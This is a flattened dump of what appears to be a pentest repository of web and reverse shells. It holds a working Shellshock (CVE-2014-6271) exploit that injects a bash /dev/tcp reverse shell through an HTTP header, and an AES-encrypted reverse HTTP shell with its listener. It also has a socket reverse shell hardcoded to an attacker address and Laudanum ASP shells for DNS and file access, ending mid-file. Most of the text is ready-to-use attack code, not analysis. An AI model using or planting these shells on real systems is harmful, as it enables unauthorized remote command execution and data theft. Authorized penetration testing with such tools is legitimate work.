├── CVE-2014-6271 └── CVE-2014-6271 cgi-bin reverse shell.py ├── Encrypted Shell ├── server.py ├── shell.exe └── shell.py ├── RevShell_PoC_v1.py ├── laudanum ├── CREDITS ├── GPL ├── README ├── asp │ ├── dns.asp │ ├── file.asp │ ├── proxy.asp │ └── shell.asp ├── aspx │ └── shell.aspx ├── cfm │ └── shell.cfm ├── jsp │ ├── cmd.war │ ├── makewar.sh │ └── warfiles │ │ ├── META-INF │ │ └── MANIFEST.MF │ │ ├── WEB-INF │ │ └── web.xml │ │ └── cmd.jsp ├── php │ ├── dns.php │ ├── file.php │ ├── host.php │ ├── killnc.php │ ├── php-reverse-shell.php │ ├── proxy.php │ └── shell.php └── wordpress │ ├── laudanum.php │ └── templates │ ├── dns.php │ ├── file.php │ ├── host.php │ ├── ipcheck.php │ ├── killnc.php │ ├── php-reverse-shell.php │ ├── proxy.php │ ├── settings.php │ └── shell.php ├── perl-reverse-shell-1.0 ├── CHANGELOG ├── COPYING.GPL ├── COPYING.PERL-REVERSE-SHELL └── perl-reverse-shell.pl ├── php-findsock-shell-1.0 ├── CHANGELOG ├── COPYING.GPL ├── COPYING.PHP-FINDSOCK-SHELL ├── findsock.c └── php-findsock-shell.php ├── php-reverse-shell-1.0 ├── CHANGELOG ├── COPYING.GPL ├── COPYING.PHP-REVERSE-SHELL └── php-reverse-shell.php └── simple_py_shell.py /CVE-2014-6271/CVE-2014-6271 cgi-bin reverse shell.py: -------------------------------------------------------------------------------- 1 | # 2 | #CVE-2014-6271 cgi-bin reverse shell 3 | # 4 | 5 | import httplib,urllib,sys 6 | 7 | if (len(sys.argv)<4): 8 | print "Usage: %s " % sys.argv[0] 9 | print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0] 10 | exit(0) 11 | 12 | conn = httplib.HTTPConnection(sys.argv[1]) 13 | reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3] 14 | 15 | headers = {"Content-type": "application/x-www-form-urlencoded", 16 | "test":reverse_shell } 17 | conn.request("GET",sys.argv[2],headers=headers) 18 | res = conn.getresponse() 19 | print res.status, res.reason 20 | data = res.read() 21 | print data -------------------------------------------------------------------------------- /Encrypted Shell/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ############################################ 3 | # 4 | # 5 | # AES Encrypted Reverse HTTP Listener by: 6 | # 7 | # Dave Kennedy (ReL1K) 8 | # http://www.secmaniac.com 9 | # 10 | # 11 | ############################################ 12 | # Copyright 2012 TrustedSec, LLC. All rights reserved. 13 | # 14 | # This piece of software code is licensed under the FreeBSD license.. 15 | # 16 | # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 17 | 18 | from BaseHTTPServer import BaseHTTPRequestHandler 19 | from BaseHTTPServer import HTTPServer 20 | import urlparse 21 | import re 22 | import os 23 | import base64 24 | from Crypto.Cipher import AES 25 | 26 | # the block size for the cipher object; must be 16, 24, or 32 for AES 27 | BLOCK_SIZE = 32 28 | # the character used for padding--with a block cipher such as AES, the value 29 | # you encrypt must be a multiple of BLOCK_SIZE in length. This character is 30 | # used to ensure that your value is always a multiple of BLOCK_SIZE 31 | PADDING = '{' 32 | # one-liner to sufficiently pad the text to be encrypted 33 | pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING 34 | 35 | # one-liners to encrypt/encode and decrypt/decode a string 36 | # encrypt with AES, encode with base64 37 | EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) 38 | DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) 39 | 40 | # 32 character secret key - change this if you want to be unique 41 | secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2" 42 | 43 | # create a cipher object using the random secret 44 | cipher = AES.new(secret) 45 | 46 | # url decode for postbacks 47 | def htc(m): 48 | return chr(int(m.group(1),16)) 49 | 50 | # url decode 51 | def urldecode(url): 52 | rex=re.compile('%([0-9a-hA-H][0-9a-hA-H])',re.M) 53 | return rex.sub(htc,url) 54 | 55 | class GetHandler(BaseHTTPRequestHandler): 56 | 57 | # handle get request 58 | def do_GET(self): 59 | 60 | # this will be our shell command 61 | message = raw_input("shell> ") 62 | # send a 200 OK response 63 | self.send_response(200) 64 | # end headers 65 | self.end_headers() 66 | # encrypt the message 67 | message = EncodeAES(cipher, message) 68 | # base64 it 69 | message = base64.b64encode(message) 70 | # write our command shell param to victim 71 | self.wfile.write(message) 72 | # return out 73 | return 74 | 75 | # handle post request 76 | def do_POST(self): 77 | 78 | # send a 200 OK response 79 | self.send_response(200) 80 | # # end headers 81 | self.end_headers() 82 | # grab the length of the POST data 83 | length = int(self.headers.getheader('content-length')) 84 | # read in the length of the POST data 85 | qs = self.rfile.read(length) 86 | # url decode 87 | url=urldecode(qs) 88 | # remove the parameter cmd 89 | url=url.replace("cmd=", "") 90 | # base64 decode 91 | message = base64.b64decode(url) 92 | # decrypt the string 93 | message = DecodeAES(cipher, message) 94 | # display the command back decrypted 95 | print message 96 | 97 | if __name__ == '__main__': 98 | 99 | # bind to all interfaces 100 | server = HTTPServer(('', 80), GetHandler) 101 | print """############################################ 102 | # 103 | # 104 | # AES Encrypted Reverse HTTP Listener by: 105 | # 106 | # Dave Kennedy (ReL1K) 107 | # http://www.secmaniac.com 108 | # 109 | # 110 | ############################################""" 111 | print 'Starting encrypted web shell server, use to stop' 112 | # simple try block 113 | try: 114 | # serve and listen forever 115 | server.serve_forever() 116 | # handle keyboard interrupts 117 | except KeyboardInterrupt: 118 | print "[!] Exiting the encrypted webserver shell.. hack the gibson." 119 | -------------------------------------------------------------------------------- /Encrypted Shell/shell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jbarcia/Web-Shells/599cae3d6c134e98d7f7384ba3e88a5114cf4c88/Encrypted Shell/shell.exe -------------------------------------------------------------------------------- /Encrypted Shell/shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ########################################################################################################################## 3 | # 4 | # 5 | # AES Encrypted Reverse HTTP Shell by: 6 | # 7 | # Dave Kennedy (ReL1K) 8 | # http://www.secmaniac.com 9 | # 10 | ########################################################################################################################## 11 | # 12 | ########################################################################################################################## 13 | # 14 | # To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules 15 | # to make it easier. Can download from here: 16 | # http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip 17 | # 18 | ########################################################################################################################## 19 | # 20 | # This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc. 21 | # 22 | ########################################################################################################################## 23 | # 24 | ########################################################################################################################## 25 | # 26 | # Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction 27 | # so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary. 28 | # 29 | ########################################################################################################################## 30 | # 31 | # export VERSIONER_PYTHON_PREFER_32_BIT=yes 32 | # python Configure.py 33 | # python Makespec.py --onefile --noconsole shell.py 34 | # python Build.py shell/shell.spec 35 | # 36 | ########################################################################################################################### 37 | # Copyright 2012 TrustedSec, LLC. All rights reserved. 38 | # 39 | # This piece of software code is licensed under the FreeBSD license.. 40 | # 41 | # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 42 | 43 | import urllib 44 | import urllib2 45 | import httplib 46 | import subprocess 47 | import sys 48 | import base64 49 | import os 50 | from Crypto.Cipher import AES 51 | 52 | 53 | # the block size for the cipher object; must be 16, 24, or 32 for AES 54 | BLOCK_SIZE = 32 55 | # the character used for padding--with a block cipher such as AES, the value 56 | # you encrypt must be a multiple of BLOCK_SIZE in length. This character is 57 | # used to ensure that your value is always a multiple of BLOCK_SIZE 58 | PADDING = '{' 59 | # one-liner to sufficiently pad the text to be encrypted 60 | pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING 61 | 62 | # one-liners to encrypt/encode and decrypt/decode a string 63 | # encrypt with AES, encode with base64 64 | EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) 65 | DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) 66 | 67 | # secret key, change this if you want to be unique 68 | secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2" 69 | 70 | # create a cipher object using the random secret 71 | cipher = AES.new(secret) 72 | 73 | # TURN THIS ON IF YOU WANT PROXY SUPPORT 74 | PROXY_SUPPORT = "OFF" 75 | # THIS WILL BE THE PROXY URL 76 | PROXY_URL = "http://proxyinfo:80" 77 | # USERNAME FOR THE PROXY 78 | USERNAME = "username" 79 | # PASSWORD FOR THE PROXY 80 | PASSWORD = "password" 81 | 82 | # here is where we set all of our proxy settings 83 | if PROXY_SUPPORT == "ON": 84 | auth_handler = urllib2.HTTPBasicAuthHandler() 85 | auth_handler.add_password(realm='RESTRICTED ACCESS', 86 | uri=PROXY_URL, # PROXY SPECIFIED ABOVE 87 | user=USERNAME, # USERNAME SPECIFIED ABOVE 88 | passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE 89 | opener = urllib2.build_opener(auth_handler) 90 | urllib2.install_opener(opener) 91 | 92 | try: 93 | # our reverse listener ip address 94 | address = sys.argv[1] 95 | # our reverse listener port address 96 | port = sys.argv[2] 97 | 98 | # except that we didn't pass parameters 99 | except IndexError: 100 | print " \nAES Encrypted Reverse HTTP Shell by:" 101 | print " Dave Kennedy (ReL1K)" 102 | print " http://www.secmaniac.com" 103 | print "Usage: shell.exe " 104 | sys.exit() 105 | 106 | # loop forever 107 | while 1: 108 | 109 | # open up our request handelr 110 | req = urllib2.Request('http://%s:%s' % (address,port)) 111 | # grab our response which contains what command we want 112 | message = urllib2.urlopen(req) 113 | # base64 unencode 114 | message = base64.b64decode(message.read()) 115 | # decrypt the communications 116 | message = DecodeAES(cipher, message) 117 | # quit out if we receive that command 118 | if message == "quit" or message == "exit": 119 | sys.exit() 120 | # issue the shell command we want 121 | proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 122 | # read out the data of stdout 123 | data = proc.stdout.read() + proc.stderr.read() 124 | # encrypt the data 125 | data = EncodeAES(cipher, data) 126 | # base64 encode the data 127 | data = base64.b64encode(data) 128 | # urlencode the data from stdout 129 | data = urllib.urlencode({'cmd': '%s'}) % (data) 130 | # who we want to connect back to with the shell 131 | h = httplib.HTTPConnection('%s:%s' % (address,port)) 132 | # set our basic headers 133 | headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} 134 | # actually post the data 135 | h.request('POST', '/index.aspx', data, headers) 136 | -------------------------------------------------------------------------------- /RevShell_PoC_v1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Simple Reverse Shell Written by: Dave Kennedy (ReL1K) 3 | # Copyright 2012 TrustedSec, LLC. All rights reserved. 4 | # 5 | # This piece of software code is licensed under the FreeBSD license.. 6 | # 7 | # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 8 | 9 | import socket 10 | import subprocess 11 | 12 | HOST = '192.168.225.136' # The remote host 13 | PORT = 443 # The same port as used by the server 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | s.connect((HOST, PORT)) 16 | # loop forever 17 | while 1: 18 | # recv command line param 19 | data = s.recv(1024) 20 | # execute command line 21 | proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 22 | # grab output from commandline 23 | stdout_value = proc.stdout.read() + proc.stderr.read() 24 | # send back to attacker 25 | s.send(stdout_value) 26 | # quit out afterwards and kill socket 27 | s.close() 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /laudanum/CREDITS: -------------------------------------------------------------------------------- 1 | The Team 2 | ======================================================== 3 | - Kevin Johnson 4 | - Project Lead 5 | 6 | - Tim Medin 7 | - Project Lead 8 | 9 | - Justin Searle 10 | - Core Developer 11 | 12 | Additional Coding 13 | ======================================================== 14 | - Robin Wood 15 | - Jason Gillam (Wordpress Plugin) -------------------------------------------------------------------------------- /laudanum/GPL: -------------------------------------------------------------------------------- 1 | The GNU General Public License (GPL) 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc. 5 | 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 6 | 7 | Everyone is permitted to copy and distribute verbatim copies 8 | of this license document, but changing it is not allowed. 9 | 10 | Preamble 11 | 12 | The licenses for most software are designed to take away your freedom to share 13 | and change it. By contrast, the GNU General Public License is intended to 14 | guarantee your freedom to share and change free software--to make sure the 15 | software is free for all its users. This General Public License applies to most 16 | of the Free Software Foundation's software and to any other program whose 17 | authors commit to using it. (Some other Free Software Foundation software is 18 | covered by the GNU Library General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not price. Our 22 | General Public Licenses are designed to make sure that you have the freedom to 23 | distribute copies of free software (and charge for this service if you wish), 24 | that you receive source code or can get it if you want it, that you can change 25 | the software or use pieces of it in new free programs; and that you know you can 26 | do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid anyone to deny 29 | you these rights or to ask you to surrender the rights. These restrictions 30 | translate to certain responsibilities for you if you distribute copies of the 31 | software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether gratis or for 34 | a fee, you must give the recipients all the rights that you have. You must make 35 | sure that they, too, receive or can get the source code. And you must show them 36 | these terms so they know their rights. 37 | 38 | We protect your rights with two steps: (1) copyright the software, and (2) 39 | offer you this license which gives you legal permission to copy, distribute 40 | and/or modify the software. 41 | 42 | Also, for each author's protection and ours, we want to make certain that 43 | everyone understands that there is no warranty for this free software. If the 44 | software is modified by someone else and passed on, we want its recipients to 45 | know that what they have is not the original, so that any problems introduced 46 | by others will not reflect on the original authors' reputations. 47 | 48 | Finally, any free program is threatened constantly by software patents. We wish 49 | to avoid the danger that redistributors of a free program will individually 50 | obtain patent licenses, in effect making the program proprietary. To prevent 51 | this, we have made it clear that any patent must be licensed for everyone's free 52 | use or not licensed at all. 53 | 54 | The precise terms and conditions for copying, distribution and modification 55 | follow. 56 | 57 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 58 | 59 | 0. This License applies to any program or other work which contains a notice 60 | placed by the copyright holder saying it may be distributed under the terms of 61 | this General Public License. The "Program", below, refers to any such program or 62 | work, and a "work based on the Program" means either the Program or any 63 | derivative work under copyright law: that is to say, a work containing the 64 | Program or a portion of it, either verbatim or with modifications and/or 65 | translated into another language. (Hereinafter, translation is included without 66 | limitation in the term "modification".) Each licensee is addressed as "you". 67 | 68 | Activities other than copying, distribution and modification are not covered by 69 | this License; they are outside its scope. The act of running the Program is not 70 | restricted, and the output from the Program is covered only if its contents 71 | constitute a work based on the Program (independent of having been made by 72 | running the Program). Whether that is true depends on what the Program does. 73 | 74 | 1. You may copy and distribute verbatim copies of the Program's source code as 75 | you receive it, in any medium, provided that you conspicuously and appropriately 76 | publish on each copy an appropriate copyright notice and disclaimer of warranty; 77 | keep intact all the notices that refer to this License and to the absence of any 78 | warranty; and give any other recipients of the Program a copy of this License 79 | along with the Program. 80 | 81 | You may charge a fee for the physical act of transferring a copy, and you may at 82 | your option offer warranty protection in exchange for a fee. 83 | 84 | 2. You may modify your copy or copies of the Program or any portion of it, thus 85 | forming a work based on the Program, and copy and distribute such modifications 86 | or work under the terms of Section 1 above, provided that you also meet all of 87 | these conditions: 88 | 89 | a) You must cause the modified files to carry prominent notices stating that 90 | you changed the files and the date of any change. 91 | 92 | b) You must cause any work that you distribute or publish, that in whole or 93 | in part contains or is derived from the Program or any part thereof, to be 94 | licensed as a whole at no charge to all third parties under the terms of 95 | this License. 96 | 97 | c) If the modified program normally reads commands interactively when run, 98 | you must cause it, when started running for such interactive use in the most 99 | ordinary way, to print or display an announcement including an appropriate 100 | copyright notice and a notice that there is no warranty (or else, saying 101 | that you provide a warranty) and that users may redistribute the program 102 | under these conditions, and telling the user how to view a copy of this 103 | License. (Exception: if the Program itself is interactive but does not 104 | normally print such an announcement, your work based on the Program is not 105 | required to print an announcement.) 106 | 107 | These requirements apply to the modified work as a whole. If identifiable 108 | sections of that work are not derived from the Program, and can be reasonably 109 | considered independent and separate works in themselves, then this License, and 110 | its terms, do not apply to those sections when you distribute them as separate 111 | works. But when you distribute the same sections as part of a whole which is a 112 | work based on the Program, the distribution of the whole must be on the terms of 113 | this License, whose permissions for other licensees extend to the entire whole, 114 | and thus to each and every part regardless of who wrote it. 115 | 116 | Thus, it is not the intent of this section to claim rights or contest your 117 | rights to work written entirely by you; rather, the intent is to exercise the 118 | right to control the distribution of derivative or collective works based on the 119 | Program. 120 | 121 | In addition, mere aggregation of another work not based on the Program with the 122 | Program (or with a work based on the Program) on a volume of a storage or 123 | distribution medium does not bring the other work under the scope of this 124 | License. 125 | 126 | 3. You may copy and distribute the Program (or a work based on it, under 127 | Section 2) in object code or executable form under the terms of Sections 1 and 2 128 | above provided that you also do one of the following: 129 | 130 | a) Accompany it with the complete corresponding machine-readable source 131 | code, which must be distributed under the terms of Sections 1 and 2 above on 132 | a medium customarily used for software interchange; or, 133 | 134 | b) Accompany it with a written offer, valid for at least three years, to 135 | give any third party, for a charge no more than your cost of physically 136 | performing source distribution, a complete machine-readable copy of the 137 | corresponding source code, to be distributed under the terms of Sections 1 138 | and 2 above on a medium customarily used for software interchange; or, 139 | 140 | c) Accompany it with the information you received as to the offer to 141 | distribute corresponding source code. (This alternative is allowed only for 142 | noncommercial distribution and only if you received the program in object 143 | code or executable form with such an offer, in accord with Subsection b 144 | above.) 145 | 146 | The source code for a work means the preferred form of the work for making 147 | modifications to it. For an executable work, complete source code means all 148 | the source code for all modules it contains, plus any associated interface 149 | definition files, plus the scripts used to control compilation and installation 150 | of the executable. However, as a special exception, the source code distributed 151 | need not include anything that is normally distributed (in either source or 152 | binary form) with the major components (compiler, kernel, and so on) of the 153 | operating system on which the executable runs, unless that component itself 154 | accompanies the executable. 155 | 156 | If distribution of executable or object code is made by offering access to copy 157 | from a designated place, then offering equivalent access to copy the source code 158 | from the same place counts as distribution of the source code, even though third 159 | parties are not compelled to copy the source along with the object code. 160 | 161 | 4. You may not copy, modify, sublicense, or distribute the Program except as 162 | expressly provided under this License. Any attempt otherwise to copy, modify, 163 | sublicense or distribute the Program is void, and will automatically terminate 164 | your rights under this License. However, parties who have received copies, or 165 | rights, from you under this License will not have their licenses terminated so 166 | long as such parties remain in full compliance. 167 | 168 | 5. You are not required to accept this License, since you have not signed it. 169 | However, nothing else grants you permission to modify or distribute the Program 170 | or its derivative works. These actions are prohibited by law if you do not 171 | accept this License. Therefore, by modifying or distributing the Program (or any 172 | work based on the Program), you indicate your acceptance of this License to do 173 | so, and all its terms and conditions for copying, distributing or modifying the 174 | Program or works based on it. 175 | 176 | 6. Each time you redistribute the Program (or any work based on the Program), 177 | the recipient automatically receives a license from the original licensor to 178 | copy, distribute or modify the Program subject to these terms and conditions. 179 | You may not impose any further restrictions on the recipients' exercise of the 180 | rights granted herein. You are not responsible for enforcing compliance by third 181 | parties to this License. 182 | 183 | 7. If, as a consequence of a court judgment or allegation of patent infringement 184 | or for any other reason (not limited to patent issues), conditions are imposed 185 | on you (whether by court order, agreement or otherwise) that contradict the 186 | conditions of this License, they do not excuse you from the conditions of this 187 | License. If you cannot distribute so as to satisfy simultaneously your 188 | obligations under this License and any other pertinent obligations, then as a 189 | consequence you may not distribute the Program at all. For example, if a patent 190 | license would not permit royalty-free redistribution of the Program by all those 191 | who receive copies directly or indirectly through you, then the only way you 192 | could satisfy both it and this License would be to refrain entirely from 193 | distribution of the Program. 194 | 195 | If any portion of this section is held invalid or unenforceable under any 196 | particular circumstance, the balance of the section is intended to apply and the 197 | section as a whole is intended to apply in other circumstances. 198 | 199 | It is not the purpose of this section to induce you to infringe any patents or 200 | other property right claims or to contest validity of any such claims; this 201 | section has the sole purpose of protecting the integrity of the free software 202 | distribution system, which is implemented by public license practices. Many 203 | people have made generous contributions to the wide range of software 204 | distributed through that system in reliance on consistent application of that 205 | system; it is up to the author/donor to decide if he or she is willing to 206 | distribute software through any other system and a licensee cannot impose that 207 | choice. 208 | 209 | This section is intended to make thoroughly clear what is believed to be a 210 | consequence of the rest of this License. 211 | 212 | 8. If the distribution and/or use of the Program is restricted in certain 213 | countries either by patents or by copyrighted interfaces, the original copyright 214 | holder who places the Program under this License may add an explicit 215 | geographical distribution limitation excluding those countries, so that 216 | distribution is permitted only in or among countries not thus excluded. In such 217 | case, this License incorporates the limitation as if written in the body of 218 | this License. 219 | 220 | 9. The Free Software Foundation may publish revised and/or new versions of the 221 | General Public License from time to time. Such new versions will be similar in 222 | spirit to the present version, but may differ in detail to address new problems 223 | or concerns. 224 | 225 | Each version is given a distinguishing version number. If the Program specifies 226 | a version number of this License which applies to it and "any later version", 227 | you have the option of following the terms and conditions either of that version 228 | or of any later version published by the Free Software Foundation. If the 229 | Program does not specify a version number of this License, you may choose any 230 | version ever published by the Free Software Foundation. 231 | 232 | 10. If you wish to incorporate parts of the Program into other free programs 233 | whose distribution conditions are different, write to the author to ask 234 | for permission. For software which is copyrighted by the Free Software 235 | Foundation, write to the Free Software Foundation; we sometimes make exceptions 236 | for this. Our decision will be guided by the two goals of preserving the free 237 | status of all derivatives of our free software and of promoting the sharing and 238 | reuse of software generally. 239 | 240 | NO WARRANTY 241 | 242 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE 243 | PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED 244 | IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS 245 | IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT 246 | NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 247 | PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE 248 | PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 249 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 250 | 251 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL 252 | ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE 253 | PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, 254 | SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY 255 | TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING 256 | RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF 257 | THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER 258 | PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 259 | -------------------------------------------------------------------------------- /laudanum/README: -------------------------------------------------------------------------------- 1 | Laudanum: Injectable Web Exploit Code v0.8 2 | 3 | By Kevin Johnson 4 | and the Laudanum Development Team 5 | 6 | Project Website: http://laudanum.secureideas.net 7 | Sourceforge Site: http://sourceforge.net/projects/laudanum 8 | 9 | SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum 10 | 11 | ------------------------------------------------------------------------------- 12 | ** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team 13 | ** 14 | ** This program is free software; you can redistribute it and/or modify 15 | ** it under the terms of the GNU General Public License as published by 16 | ** the Free Software Foundation; either version 2 of the License, or 17 | ** (at your option) any later version. 18 | ** 19 | ** This program is distributed in the hope that it will be useful, 20 | ** but WITHOUT ANY WARRANTY; without even the implied warranty of 21 | ** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 22 | ** GNU General Public License for more details. 23 | ** 24 | ** You should have received a copy of the GNU General Public License 25 | ** along with this program; if not, write to the Free Software 26 | ** Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 27 | ------------------------------------------------------------------------------- 28 | 29 | I. ABOUT 30 | _____________________________________ 31 | Laudanum is a collection of injectable files, designed to be used in a pentest 32 | when upload vulnerabilities, administrative interfaces, and SQL injection flaws 33 | are found. These files are written in multiple languages for different 34 | environments. They provide functionality such as shell, DNS query, LDAP 35 | retrieval and others. 36 | -------------------------------------------------------------------------------- /laudanum/asp/dns.asp: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson 14 | ' *** 15 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** This file provides access to DNS on the system. 20 | ' *** Written by Tim Medin 21 | ' *** 22 | ' ******************************************************************************** 23 | ' *** This program is free software; you can redistribute it and/or 24 | ' *** modify it under the terms of the GNU General Public License 25 | ' *** as published by the Free Software Foundation; either version 2 26 | ' *** of the License, or (at your option) any later version. 27 | ' *** 28 | ' *** This program is distributed in the hope that it will be useful, 29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | ' *** GNU General Public License for more details. 32 | ' *** 33 | ' *** You can get a copy of the GNU General Public License from this 34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | ' *** You can also write to the Free Software Foundation, Inc., Temple 36 | ' *** Place - Suite Boston, MA USA. 37 | ' *** 38 | ' ***************************************************************************** */ 39 | 40 | ' ***************** Config entries below *********************** 41 | 42 | ' IPs are enterable as individual addresses TODO: add CIDR support 43 | Dim allowedIPs 44 | Dim allowed 45 | Dim qtypes 46 | Dim qtype 47 | Dim validtype 48 | Dim query 49 | Dim i 50 | Dim command 51 | 52 | allowedIPs = "192.168.0.1,127.0.0.1" 53 | ' Just in cace you added a space in the line above 54 | allowedIPs = replace(allowedIPS," ","") 55 | 'turn it into an array 56 | allowedIPs = split(allowedIPS,",") ' 57 | 58 | ' make sure the ip is allowed 59 | allowed = 0 60 | for i = lbound(allowedIPs) to ubound(allowedIPs) 61 | if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then 62 | allowed = 1 63 | Exit For 64 | end if 65 | next 66 | ' send a 404 if not the allowed IP 67 | if allowed = 0 then 68 | Response.Status = "404 File Not Found" 69 | Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) 70 | Response.End 71 | end if 72 | 73 | %> 74 | 75 | 76 | Laudanum ASP DNS Access 77 | 78 | 79 | 84 | 85 | 86 | 87 |

DNS Query 0.1

<%
139 | 	Response.Write command & "
"
140 | 	Response.Write replace(strPResult,vbCrLf,"
")
141 | 	%>

<% 142 | end if 143 | %> 144 |

145 |

146 | Copyright © 2014, Kevin Johnson and the Laudanum team.
147 | Written by Tim Medin.
148 | Get the latest version at laudanum.secureideas.net. 149 |

150 | 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /laudanum/asp/file.asp: -------------------------------------------------------------------------------- 1 | <%@Language="VBScript"%> 2 | <%Option Explicit%> 3 | <%Response.Buffer = True%> 4 | <% 5 | ' ******************************************************************************* 6 | ' *** 7 | ' *** Laudanum Project 8 | ' *** A Collection of Injectable Files used during a Penetration Test 9 | ' *** 10 | ' *** More information is available at: 11 | ' *** http://laudanum.secureideas.net 12 | ' *** laudanum@secureideas.net 13 | ' *** 14 | ' *** Project Leads: 15 | ' *** Kevin Johnson 17 | ' *** 18 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 19 | ' *** 20 | ' ******************************************************************************** 21 | ' *** 22 | ' *** This file provides access to the file system. 23 | ' *** Written by Tim Medin 24 | ' *** 25 | ' ******************************************************************************** 26 | ' *** This program is free software; you can redistribute it and/or 27 | ' *** modify it under the terms of the GNU General Public License 28 | ' *** as published by the Free Software Foundation; either version 2 29 | ' *** of the License, or (at your option) any later version. 30 | ' *** 31 | ' *** This program is distributed in the hope that it will be useful, 32 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | ' *** GNU General Public License for more details. 35 | ' *** 36 | ' *** You can get a copy of the GNU General Public License from this 37 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | ' *** You can also write to the Free Software Foundation, Inc., Temple 39 | ' *** Place - Suite Boston, MA USA. 40 | ' *** 41 | ' ***************************************************************************** */ 42 | 43 | ' ***************** Config entries below *********************** 44 | 45 | ' Define variables 46 | Dim allowedIPs 47 | Dim allowed 48 | Dim filepath 49 | Dim file 50 | Dim stream 51 | Dim path 52 | Dim i 53 | Dim fso 54 | Dim folder 55 | Dim list 56 | Dim temppath 57 | 58 | ' IPs are enterable as individual addresses TODO: add CIDR support 59 | allowedIPs = "192.168.0.1,127.0.0.1,::1" 60 | ' Just in cace you added a space in the line above 61 | allowedIPs = replace(allowedIPS," ","") 62 | 'turn it into an array 63 | allowedIPs = split(allowedIPS,",") ' 64 | ' make sure the ip is allowed 65 | allowed = 0 66 | for i = lbound(allowedIPs) to 